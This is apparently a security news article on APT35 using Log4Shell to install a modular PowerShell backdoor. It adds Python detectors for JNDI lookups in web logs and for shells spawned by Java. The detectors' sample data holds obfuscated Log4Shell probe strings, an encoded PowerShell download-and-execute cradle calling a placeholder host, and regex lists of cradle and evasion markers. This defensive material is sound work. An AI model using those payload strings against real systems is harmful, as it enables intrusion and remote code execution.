Beware! Threat Actors Using Log4j to Install New Backdoor

It seems Log4j is not going anywhere in 2022, much like the novel coronavirus. The cat is out of the bag and running wild, with no sign of stopping. A recent analysis by security firm Check Point shows that a state-backed threat actor tracked as APT35 is now exploiting the Log4j vulnerability (Log4Shell, CVE-2021-44228) to deliver a brand-new, PowerShell-based malicious toolkit.

The same threat actor is tracked as Phosphorus by Microsoft's security researchers and is assessed to be an Iranian state-backed group. Last week Microsoft warned that multiple state-backed threat actors were already probing at scale for networks that still expose unpatched, Log4j-vulnerable systems.

APT35 Uses Known Tools

Check Point's research into the latest APT35 campaign shows that the operators were not particularly careful. The report describes their initial attack vector as "rushed": they relied on a basic open-source exploitation tool that had been publicly available on GitHub until its takedown, rather than on anything custom.
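Because the initial access is a plain Log4Shell exploit, the first thing a defender can do is look for the JNDI lookup strings in web access logs. The following is an added example written for this page (it is not Check Point's code and not the tool APT35 used): it normalizes the common obfuscations that public exploit scripts apply to the `${jndi:...}` string (URL encoding, nested `${lower:...}`/`${upper:...}` lookups, and the `${x:-y}` default-value trick) before matching. The log lines, IP addresses and URLs are constructed samples in documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format; none of this is data from
# the Check Point report. Line 1 and 5 are benign, 2-4 are probes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jan/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [12/Jan/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.7:1389/b}"
10.0.0.9 - - [12/Jan/2022:10:01:11 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.0.2 - - [12/Jan/2022:10:02:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Innermost nested lookups attackers use to hide the literal "jndi" string.
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${anything:-value} evaluates to "value" when the lookup is undefined.
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(value: str) -> str:
    """Undo URL encoding and collapse nested lookups until the string is stable."""
    for _ in range(3):  # peel repeated URL-encoding, bounded to avoid loops
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    prev = None
    while prev != value:
        prev = value
        value = _CASE_RE.sub(lambda m: m.group(1), value)
        value = _DEFAULT_RE.sub(lambda m: m.group(1), value)
    return value


def find_log4shell_attempts(log_text: str) -> list:
    """Return one finding per line whose request, referer or user-agent
    contains a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for field in ("req", "ref", "ua"):
            norm = normalize(m.group(field))
            j = _JNDI_RE.search(norm)
            if j:
                hits.append({"line": lineno, "src": m.group("ip"), "field": field,
                             "scheme": j.group(1).lower(), "payload": norm})
                break
    return hits


if __name__ == "__main__":
    for h in find_log4shell_attempts(SAMPLE_LOG):
        print(f'line {h["line"]}: {h["src"]} via {h["field"]} ({h["scheme"]}): {h["payload"]}')
```

The benign `${date:yyyy}` lookup on the last line is deliberately not flagged: the pattern keys on `jndi:` followed by a scheme, so it reports the protocol (`ldap`, `rmi`, `dns`) the probe would use, which is what you need when deciding which outbound connections to hunt for next.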

Once APT35 gains access, the group installs a modular, PowerShell-based backdoor to establish persistence on the compromised network. The same PowerShell implant communicates with the command-and-control (C2) servers, downloads additional malicious modules and runs commands.
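A PowerShell implant dropped through Log4Shell leaves a very distinctive parent-child relationship: the Java process hosting the vulnerable application spawns a shell. The following is an added example for this page, not Check Point's detection logic and not based on the campaign's actual command lines: it scans constructed process-creation events (Sysmon Event ID 1-style JSON, simplified field names), flags shells whose parent is `java.exe`/`javaw.exe`, decodes any `-EncodedCommand` payload (base64 of UTF-16LE text) and tags common download-cradle and evasion indicators. Paths, PIDs and the download URL are made up.

```python
import base64
import json
import re


def ps_encode(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (used
    here only to build the constructed sample event)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str):
    """Decode a -EncodedCommand payload; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample: one encoded cradle from java.exe, one legitimate admin
# script from explorer.exe, one bare cmd.exe from java.exe, one conhost child.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.8/s.ps1')"
JAVA = r"C:\Program Files\Java\jdk-11\bin\java.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4120, "Image": PS, "ParentImage": JAVA, "ParentCommandLine": "java -jar app.jar",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ps_encode(CRADLE)},
    {"ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe", "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 4203, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": JAVA,
     "ParentCommandLine": "java -jar app.jar", "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 4210, "Image": r"C:\Windows\System32\conhost.exe", "ParentImage": JAVA,
     "ParentCommandLine": "java -jar app.jar", "CommandLine": "conhost.exe 0x4"},
])

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
JAVA_PARENTS = {"java.exe", "javaw.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
INDICATORS = [
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("profile bypass", re.compile(r"(?i)-nop(?:rofile)?\b")),
    ("download cradle", re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient")),
    ("dynamic execution", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
]


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(ev: dict):
    """Return a finding for a shell spawned by a Java process, else None."""
    child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if child not in SHELLS or parent not in JAVA_PARENTS:
        return None
    cmd = ev["CommandLine"]
    reasons = [f"{parent} spawned {child}"]
    m = _ENC_RE.search(cmd)
    decoded = decode_encoded_command(m.group(1)) if m else None
    if decoded is not None:
        reasons.append("encoded command")
    text = cmd + " " + (decoded or "")  # inspect both the wrapper and the payload
    reasons += [name for name, rx in INDICATORS if rx.search(text)]
    return {"pid": ev["ProcessId"], "parent": parent, "child": child,
            "decoded": decoded, "reasons": reasons}


def scan_events(jsonl: str) -> list:
    events = (json.loads(l) for l in jsonl.splitlines() if l.strip())
    return [f for f in map(analyze_event, events) if f]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f'pid {f["pid"]}: {", ".join(f["reasons"])}')
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The bare `cmd.exe /c whoami` child is reported with only the parent-child reason; that is intentional, because a web application's JVM has no business launching a shell at all, and the post-exploitation commands the page describes (system reconnaissance before the C2 server decides which modules to send) look exactly like that.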

Modular Backdoor Used by APT35

The core PowerShell module collects information about the compromised system and sends it back to the control server. Based on the response, the server may decide to push the attack further by executing additional modules written in C# or PowerShell. These extra modules perform tasks such as exfiltrating information or encrypting data on the network.

The functionality does not stop there. Other modules capture screenshots or enumerate running processes, and a cleanup module removes the traces left by the reconnaissance and the other modules and terminates their processes.

Despite the seemingly rich functionality of the toolkit deployed after the initial exploit, the researchers did not think too highly of APT35. The group reused previously known public tools, which makes detection easy, and relied on existing C2 infrastructure that was already known to defenders, which makes life easier for security monitoring and rings alarm bells quickly. Sloppy tradecraft is not the same as harmless, though: the initial exploit still works against any system that has not been patched, regardless of how well known the follow-on tooling is.

It is fairly certain that we will hear about many newer and more creative attacks abusing Log4j vulnerabilities in one way or another throughout 2022. Hopefully, companies and software and platform developers will work together quickly enough to at least keep pace with the attackers rather than fall behind them.